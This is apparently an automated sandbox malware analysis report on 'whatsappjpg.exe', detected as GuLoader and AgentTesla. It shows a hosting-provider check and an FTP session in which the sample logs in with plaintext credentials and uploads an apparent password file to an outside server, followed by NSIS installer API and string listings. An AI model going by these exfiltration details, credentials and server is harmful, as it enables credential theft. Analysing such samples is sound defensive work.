Oct 31, 2024 10:36:21.977819920 CET	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Oct 31, 2024 10:36:22.577816010 CET	174	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:36:21 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 5 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 74 72 75 65 0a Data Ascii: true

FTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Oct 31, 2024 10:36:24.762875080 CET	21	49976	203.161.184.34	192.168.2.9	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 16:36. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 16:36. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 16:36. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 16:36. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Oct 31, 2024 10:36:24.763304949 CET	49976	21	192.168.2.9	203.161.184.34	USER code@hearing-vision.com
Oct 31, 2024 10:36:25.100236893 CET	21	49976	203.161.184.34	192.168.2.9	331 User code@hearing-vision.com OK. Password required
Oct 31, 2024 10:36:25.100382090 CET	49976	21	192.168.2.9	203.161.184.34	PASS LILKOOLL14!
Oct 31, 2024 10:36:25.477763891 CET	21	49976	203.161.184.34	192.168.2.9	230 OK. Current restricted directory is /
Oct 31, 2024 10:36:25.813565016 CET	21	49976	203.161.184.34	192.168.2.9	504 Unknown command
Oct 31, 2024 10:36:25.813751936 CET	49976	21	192.168.2.9	203.161.184.34	PWD
Oct 31, 2024 10:36:26.149698019 CET	21	49976	203.161.184.34	192.168.2.9	257 "/" is your current location
Oct 31, 2024 10:36:26.155028105 CET	49976	21	192.168.2.9	203.161.184.34	TYPE I
Oct 31, 2024 10:36:26.490858078 CET	21	49976	203.161.184.34	192.168.2.9	200 TYPE is now 8-bit binary
Oct 31, 2024 10:36:26.491040945 CET	49976	21	192.168.2.9	203.161.184.34	PASV
Oct 31, 2024 10:36:26.827927113 CET	21	49976	203.161.184.34	192.168.2.9	227 Entering Passive Mode (203,161,184,34,196,254)
Oct 31, 2024 10:36:26.833873987 CET	49976	21	192.168.2.9	203.161.184.34	STOR PW_user-855271_2024_10_31_05_36_23.html
Oct 31, 2024 10:36:27.736864090 CET	21	49976	203.161.184.34	192.168.2.9	150 Accepted data connection
Oct 31, 2024 10:36:28.075668097 CET	21	49976	203.161.184.34	192.168.2.9	226-File successfully transferred 226-File successfully transferred226 0.339 seconds (measured here), 0.92 Kbytes per second

Target ID:	0
Start time:	05:34:00
Start date:	31/10/2024
Path:	C:\Users\user\Desktop\whatsappjpg.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\whatsappjpg.exe"
Imagebase:	0x400000
File size:	741'566 bytes
MD5 hash:	8A3F9583866E402739F7DA1541D6038D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2581366232.0000000005FA6000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	05:36:03
Start date:	31/10/2024
Path:	C:\Users\user\Desktop\whatsappjpg.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\whatsappjpg.exe"
Imagebase:	0x400000
File size:	741'566 bytes
MD5 hash:	8A3F9583866E402739F7DA1541D6038D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3844735931.00000000364AF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.3844735931.0000000036483000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3844735931.0000000036483000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	19.7%
Dynamic/Decrypted Code Coverage:	15.1%
Signature Coverage:	20.9%
Total number of Nodes:	1507
Total number of Limit Nodes:	38

Executed Functions

Function 00403358 Relevance: 75.6, APIs: 27, Strings: 16, Instructions: 335
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 00403377
SetErrorMode.KERNELBASE(00008001), ref: 00403382
OleInitialize.OLE32(00000000), ref: 00403389

Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
Part of subcall function 00406252: LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280

SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B1

Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5

GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C6
GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\whatsappjpg.exe",00000000), ref: 004033D9
CharNextW.USER32(00000000,"C:\Users\user\Desktop\whatsappjpg.exe",00000020), ref: 00403400
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403509
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040351A
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403526
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040353A
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403542
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403553
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040355B
DeleteFileW.KERNELBASE(1033), ref: 0040356F
OleUninitialize.OLE32(?), ref: 0040361F
ExitProcess.KERNEL32 ref: 0040363F
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\whatsappjpg.exe",00000000,?), ref: 0040364B
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\whatsappjpg.exe",00000000,?), ref: 00403657
CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403663
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040366A
DeleteFileW.KERNEL32(0041FE90,0041FE90,?,0042A000,?), ref: 004036C4
CopyFileW.KERNEL32(C:\Users\user\Desktop\whatsappjpg.exe,0041FE90,?), ref: 004036D8
CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403705
GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375B
ExitWindowsEx.USER32(00000002,00000000), ref: 00403797
ExitProcess.KERNEL32 ref: 004037BA

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004034FE, 00403503, 00403519, 00403525, 00403534, 00403541, 0040354D, 00403555, 0040364A, 00403656, 00403662, 00403669, 0040371A
"C:\Users\user\Desktop\whatsappjpg.exe", xrefs: 004033CC, 004033D2, 00403593
C:\Users\user\Desktop, xrefs: 00403650, 00403655, 00403679
TMP, xrefs: 00403556
C:\Users\user\Desktop\whatsappjpg.exe, xrefs: 004036D3
C:\Users\user\Uploadable\normallnnens, xrefs: 004035FC
\Temp, xrefs: 00403520
SeShutdownPrivilege, xrefs: 0040376D
1033, xrefs: 0040356A
Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040336B
NSIS Error, xrefs: 004033B7
C:\Users\user\Uploadable\normallnnens, xrefs: 004034EE, 004035F1, 00403670, 0040367A
~nsu.tmp, xrefs: 00403645
TEMP, xrefs: 0040354E
Error launching installer, xrefs: 004035D6
Low, xrefs: 0040353C

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
String ID: "C:\Users\user\Desktop\whatsappjpg.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\whatsappjpg.exe$C:\Users\user\Uploadable\normallnnens$C:\Users\user\Uploadable\normallnnens$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
API String ID: 4107622049-615831552
Opcode ID: a3fc4b19b007463ca7c8d179c052c8cc71bf452235c419b64912ac856f47fe19
Instruction ID: d10961c3cf085e12fbe59355e5df5276e8fc63a686dc482ac58f4e9f7edec25e
Opcode Fuzzy Hash: a3fc4b19b007463ca7c8d179c052c8cc71bf452235c419b64912ac856f47fe19
Instruction Fuzzy Hash: 8CB1E070904211AAD720BF629D49A3B3EACEB45706F40453FF542B62E2D77C5A41CB7E

Function 004052D1 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 00405330
GetDlgItem.USER32(?,000003EE), ref: 0040533F
GetClientRect.USER32(?,?), ref: 0040537C
GetSystemMetrics.USER32(00000015), ref: 00405384
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A5
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B6
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053C9
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D7
SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EA
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540C
ShowWindow.USER32(?,00000008), ref: 00405420
GetDlgItem.USER32(?,000003EC), ref: 00405441
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405451
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546A
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405476
GetDlgItem.USER32(?,000003F8), ref: 0040534E

Part of subcall function 00404162: SendMessageW.USER32(00000028,?,?,00403F8E), ref: 00404170

GetDlgItem.USER32(?,000003EC), ref: 00405493
CreateThread.KERNELBASE(00000000,00000000,Function_00005265,00000000), ref: 004054A1
CloseHandle.KERNELBASE(00000000), ref: 004054A8
ShowWindow.USER32(00000000), ref: 004054CC
ShowWindow.USER32(?,00000008), ref: 004054D1
ShowWindow.USER32(00000008), ref: 0040551B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040554F
CreatePopupMenu.USER32 ref: 00405560
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405574
GetWindowRect.USER32(?,?), ref: 00405594
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AD
SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E5
OpenClipboard.USER32(00000000), ref: 004055F5
EmptyClipboard.USER32 ref: 004055FB
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405607
GlobalLock.KERNEL32(00000000), ref: 00405611
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405625
GlobalUnlock.KERNEL32(00000000), ref: 00405645
SetClipboardData.USER32(0000000D,00000000), ref: 00405650
CloseClipboard.USER32 ref: 00405656

Strings

{, xrefs: 00405539
kS, xrefs: 00405525

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {$kS
API String ID: 590372296-3108425004
Opcode ID: 87920c7df50ef61a94b7578fd0a9d958e3cbbc70f9eaf2428e155cfd517307d8
Instruction ID: dd9d9050def2d8c918bbc93d53338e60564b8b02708ef31213df2d5f0290820b
Opcode Fuzzy Hash: 87920c7df50ef61a94b7578fd0a9d958e3cbbc70f9eaf2428e155cfd517307d8
Instruction Fuzzy Hash: 51B15C70900209BFDB219F60DD89EAE7B79FB04355F40803AFA05BA1A0C7759E52DF69

Function 00405F0A Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,?,004051C9,Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00000000,00000000,00000000), ref: 00405FCD
GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040604B
GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 0040605E
SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609A
SHGetPathFromIDListW.SHELL32(?,Call), ref: 004060A8
CoTaskMemFree.OLE32(?), ref: 004060B3
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D7
lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,?,004051C9,Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00000000,00000000,00000000), ref: 00406131

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00406019
Call, xrefs: 00405F34, 00406014, 00406035, 0040604A, 0040605D, 00406079, 004060A4, 004060D6, 004060DC, 004060F6, 0040610A, 0040612A, 00406130, 0040613C, 0040616F
Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll, xrefs: 00405F2F
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004060D1

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-4157780569
Opcode ID: b2fd181688fdcd7ef8372c6a65a03fcc3ebadb4944a4dbb58e26645ff48e73ec
Instruction ID: 384f9b18ecc494a8ae61019a25258fdef34cde8ff9634092dda9820a5ebc2bca
Opcode Fuzzy Hash: b2fd181688fdcd7ef8372c6a65a03fcc3ebadb4944a4dbb58e26645ff48e73ec
Instruction Fuzzy Hash: 51610331A40505ABDB209F25CC44AAF37B5EF04314F51813BE956BB2E1D73D8AA2CB5E

Function 00405770 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,"C:\Users\user\Desktop\whatsappjpg.exe"), ref: 00405799
lstrcatW.KERNEL32(004246D8,\*.*,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,"C:\Users\user\Desktop\whatsappjpg.exe"), ref: 004057E1
lstrcatW.KERNEL32(?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,"C:\Users\user\Desktop\whatsappjpg.exe"), ref: 00405804
lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,"C:\Users\user\Desktop\whatsappjpg.exe"), ref: 0040580A
FindFirstFileW.KERNEL32(004246D8,?,?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,"C:\Users\user\Desktop\whatsappjpg.exe"), ref: 0040581A
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BA
FindClose.KERNEL32(00000000), ref: 004058C9

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040577E
"C:\Users\user\Desktop\whatsappjpg.exe", xrefs: 00405779
\*.*, xrefs: 004057DB

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\whatsappjpg.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-1167077783
Opcode ID: e6b69e57f949e1376218aa512c161c788fd1e46ec07f5cd4f65730723e5a92ce
Instruction ID: ac1757c2d801c66fd25662a47f0a2b95df28272739e9ed83f1af15967125822e
Opcode Fuzzy Hash: e6b69e57f949e1376218aa512c161c788fd1e46ec07f5cd4f65730723e5a92ce
Instruction Fuzzy Hash: D541B132800A14F6DB217B659C49AAF76B8DF41724F20817BF801B21D1D77C4D92DE6E

Function 00401752 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\Uploadable\normallnnens,?,?,00000031), ref: 00401793
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\Uploadable\normallnnens,?,?,00000031), ref: 004017B8

Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5

Part of subcall function 00405192: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
Part of subcall function 00405192: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00402D92,00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00000000,00000000,00000000), ref: 004051ED
Part of subcall function 00405192: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll), ref: 004051FF
Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

Strings

C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp, xrefs: 00401804, 00401822
Call, xrefs: 00401770, 00401779, 00401786, 00401798, 004017A4, 004017DA, 004017F0, 0040180E, 0040184A, 004018CB, 004018D4, 004018DE, 004018E9
C:\Users\user\Uploadable\normallnnens, xrefs: 00401781
C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll, xrefs: 00401818, 00401834

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp$C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll$C:\Users\user\Uploadable\normallnnens$Call
API String ID: 1941528284-2382031231
Opcode ID: c934a5f4023ad52aa090981e8ce84fa05bfe414c99e0bb626fd2f32e4f320a2f
Instruction ID: 10c9bfb48ac22d70b7a6fd4bf6847715cc6e5200bae8767ad0241ecc3b8f07ee
Opcode Fuzzy Hash: c934a5f4023ad52aa090981e8ce84fa05bfe414c99e0bb626fd2f32e4f320a2f
Instruction Fuzzy Hash: 6841B172904519BACF10BBB5CC86DAF7679EF05329F20463BF521B11E1D63C8A41CA6E

Function 0040653D Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
Instruction ID: 813cf183cee5dec966489ce4b0e77547af2495df81e7d873cacca3ac907c1fa9
Opcode Fuzzy Hash: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
Instruction Fuzzy Hash: 95F18770D00229CBCF18CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44

Function 0040622B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00425720,00424ED8,00405A84,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,76F92EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,76F92EE0), ref: 00406236
FindClose.KERNEL32(00000000), ref: 00406242

Strings

WB, xrefs: 0040622C

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: WB
API String ID: 2295610775-2854515933
Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
